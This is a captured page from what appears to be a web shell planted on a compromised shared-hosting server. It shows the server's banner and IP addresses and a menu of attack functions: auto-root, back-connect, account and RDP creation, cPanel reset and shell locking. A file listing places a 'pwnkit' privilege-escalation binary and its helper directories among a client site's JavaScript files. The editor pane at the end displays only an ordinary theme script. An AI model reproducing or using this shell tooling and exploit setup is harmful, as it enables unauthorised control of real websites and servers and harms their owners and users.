Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.117.71.102
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
amrapurtailor /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
bootstrap-select.min.js
49.45
KB
-rw-r--r--
bootstrap.min.js
58.61
KB
-rw-r--r--
custom.js
11.51
KB
-rw-r--r--
greensock.js
114.81
KB
-rw-r--r--
jquery.fancybox.min.js
66.65
KB
-rw-r--r--
jquery.min.js
84.89
KB
-rw-r--r--
layerslider.kreaturamedia.jque...
123.59
KB
-rw-r--r--
layerslider.transitions.js
23.27
KB
-rw-r--r--
mixitup.min.js
86.94
KB
-rw-r--r--
owl.carousel.min.js
43.3
KB
-rw-r--r--
paraxify.js
4.44
KB
-rw-r--r--
popper.min.js
20.76
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
validate.js
20.4
KB
-rw-r--r--
wow.min.js
8.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : custom.js
(function($) { 'use strict'; //Cache jQuery Selector var $window = $(window), $header = $('header'), // for fixed-header & for navbar all $navigation = $('#navbarSupportedContent'), //for navbar all $dropdown = $('.dropdown-toggle'), //for navbar all $mix_tab = $('.mix-tab'), //for mixitup $brand = $('.partner-slider'), //for partner-slider $single_carousel = $('.single-carousel'), $single_carusel_text = $('.text-carusel'), $three_item = $('.3block-carousel'), $three_item_no_margin = $('.3block-carousel-nomargin'), $four_item = $('.4block-carousel'), $contact = $('#contact-form'); //Parallax - START CODE if($('.paraxify').length){ $(function() { $window .on("load resize scroll", function() { paraxify('.paraxify'); }); }); } // Slider push menu visible if(document.querySelector('.push-nav-toggle') !== null) { var $this = $('.push-nav-toggle'), $close = $('.slide-nav-close'), $sidenav = $('.nav-leftpush-overlay .navbar-expand-lg .navbar-slide-push'); $this.on('click', function(event){ event.preventDefault(); $sidenav.addClass('visible'); $('#page_wrapper').addClass('overlay'); event.stopPropagation(); }); $sidenav.on('click', function(event) { event.stopPropagation(); }); $window.on('click', function(e) { $sidenav.removeClass('visible'); $('#page_wrapper').removeClass('overlay'); }); $close.on('click', function(e) { $sidenav.removeClass('visible'); $('#page_wrapper').removeClass('overlay'); }); } // Auto active class adding with navigation //for navbar all $window.on('load', function() { var current = location.pathname; var $path = current.substring(current.lastIndexOf('https://unicoderbd.com/') + 1); $('#navbarSupportedContent li a').each(function(e) { var $this = $(this); // if the current path is like this link, make it active if ($path == $this.attr('href')) { $this.parent('li').addClass('active'); } else if ($path == '') { $('.navbar-nav li:first-child').addClass('active'); } }) }); // Put slider space for nav not in mini screen //for navbar all if (document.querySelector('.nav-on-top') !== null) { var get_height = jQuery('.nav-on-top').height(); if (get_height > 0 && $window.width() > 991) { jQuery('.nav-on-top').next().css('margin-top', get_height); } $window.on('resize', function() { $header.removeClass('fixed-top'); var get_height = jQuery('.nav-on-top').height(); if ($window.width() < 991) { jQuery('.nav-on-top').next().css('margin-top', '0'); } else { jQuery('.nav-on-top').next().css('margin-top', get_height); } }); } if (document.querySelector('.nav-on-banner') !== null) { var get_height = jQuery('.nav-on-banner').height(); if (get_height > 0 && $window.width() > 991) { //jQuery('.nav-on-banner').next().css('padding-top', get_height); } $window.on('resize', function() { $header.removeClass('fixed-top'); var get_height = jQuery('.nav-on-banner').height(); if ($window.width() < 991) { //jQuery('.nav-on-banner').next().css('padding-top', '0'); } else { // jQuery('.nav-on-banner').next().css('padding-top', get_height); } }); } // dropdown submenu on hover in desktop and dropdown sub menu on click in mobile //for navbar all $navigation.each(function() { $dropdown.on('click', function(e) { if ($window.width() < 1100) { if ($(this).parent('.dropdown').hasClass('visible')) { $(this).parent('.dropdown').children('.dropdown-menu').first().stop(true, true).slideUp(300); $(this).parent('.dropdown').removeClass('visible'); //window.location = $(this).attr('href'); } else { e.preventDefault(); $(this).parent('.dropdown').siblings('.dropdown').children('.dropdown-menu').slideUp(300); $(this).parent('.dropdown').siblings('.dropdown').removeClass('visible'); $(this).parent('.dropdown').children('.dropdown-menu').slideDown(300); $(this).parent('.dropdown').addClass('visible'); } e.stopPropagation(); } }); $('body').on('click', function(e) { $dropdown.parent('.dropdown').removeClass('visible'); }); $window.on('resize', function() { if ($window.width() > 991) { $('.dropdown-menu').removeAttr('style'); $('.dropdown ').removeClass('visible'); } }); }); // Toogle fixed-top class in header when window scroll 200px //for fixed-header function headerStyle() { if ($header.length) { var windowpos = $window.scrollTop(); if (windowpos >= 200) { $header.addClass('fixed-top'); } else { $header.removeClass('fixed-top'); } } } // Fact Counter For Achivement Counting //for fact-counting function factCounter() { if ($('.fact-counter').length) { $('.fact-counter .count.animated').each(function() { var $t = $(this), n = $t.find(".count-num").attr("data-stop"), r = parseInt($t.find(".count-num").attr("data-speed"), 10); if (!$t.hasClass("counted")) { $t.addClass("counted"); $({ countNum: $t.find(".count-text").text() }).animate({ countNum: n }, { duration: r, easing: "linear", step: function() { $t.find(".count-num").text(Math.floor(this.countNum)); }, complete: function() { $t.find(".count-num").text(this.countNum); } }); } //set skill building height var size = $(this).children('.progress-bar').attr('aria-valuenow'); $(this).children('.progress-bar').css('width', size + '%'); }); } } // MixIt-up tab calling //for mixitup if ($mix_tab.length) { var containerEl = document.querySelector('.mix-element'); var mixer = mixitup(containerEl); } // Single carousel slide if ($single_carousel.length) { $single_carousel.owlCarousel({ loop: true, margin: 30, nav: true, dots: true, smartSpeed: 500, autoplay: false, responsive: { 0: { items: 1 } } }); } // Single Product Image Slide //for single shop slider if ($(".full-img-sweep").length) { $('.full-img-sweep').layerSlider({ sliderVersion: '6.0.0', responsiveUnder: 0, layersContainer: 0, slideBGSize: 'auto', autoStart: 'false', showCircleTimer: 'false', skin: 'noskin', thumbnailNavigation: 'always', skinsPath: 'assets/skins/' }); } // Start When document is Scrollig, do //for fact-counting & fixed-header $(window).on('scroll', function() { headerStyle(); factCounter(); }); // Contact Form Validation if($contact.length){ $contact.validate({ //#contact-form contact form id rules: { firstname: { required: true // Field name here }, email: { required: true, // Field name here email: true }, subject: { required: true }, message: { required: true } }, messages: { firstname: "Please enter your First Name", //Write here your error message that you want to show in contact form email: "Please enter valid Email", //Write here your error message that you want to show in contact form subject: "Please enter your Subject", //Write here your error message that you want to show in contact form message: "Please write your Message" //Write here your error message that you want to show in contact form }, submitHandler: function (form) { $('#send').attr({'disabled' : 'true', 'value' : 'Sending...' }); $.ajax({ type: "POST", url: "email.php", data: $(form).serialize(), success: function () { $('#send').removeAttr('disabled').attr('value', 'Send'); $( "#success").slideDown( "slow" ); setTimeout(function() { $( "#success").slideUp( "slow" ); }, 5000); form.reset(); }, error: function() { $('#send').removeAttr('disabled').attr('value', 'Send'); $( "#error").slideDown( "slow" ); setTimeout(function() { $( "#error").slideUp( "slow" ); }, 5000); } }); return false; // required to block normal submit since you used ajax } }); } // Elements Animation for //fact-counting if ($('.wow').length) { var wow = new WOW({ boxClass: 'wow', // animated element css class (default is wow) animateClass: 'animated', // animation css class (default is animated) offset: 0, // distance to the element when triggering the animation (default is 0) mobile: true, // trigger animations on mobile devices (default is true) live: true // act on asynchronously loaded content (default is true) }); wow.init(); } // bootstrap selectpiker //for bootstrap-select if ($(".selectpicker").length) { $(function() { $('.selectpicker').selectpicker(); }); } // Single Accordean //foe accordean var acc = document.getElementsByClassName("accordion"); var i; for (i = 0; i < acc.length; i++) { acc[i].addEventListener("click", function() { /* Toggle between adding and removing the "active" class, to highlight the button that controls the panel */ this.classList.toggle("active"); /* Toggle between hiding and showing the active panel */ var panel = this.nextElementSibling; if (panel.style.maxHeight) { panel.style.maxHeight = null; } else { panel.style.maxHeight = panel.scrollHeight + "px"; } }); } // Scroll top by clicking arrow up //for scroll-top $window.scroll(function() { if ($(this).scrollTop() > 500) { $('#scroll').fadeIn(); } else { $('#scroll').fadeOut(); } }); $('#scroll').click(function() { $("html, body").animate({ scrollTop: 0 }, 1000); return !1; }); })(jQuery);
Close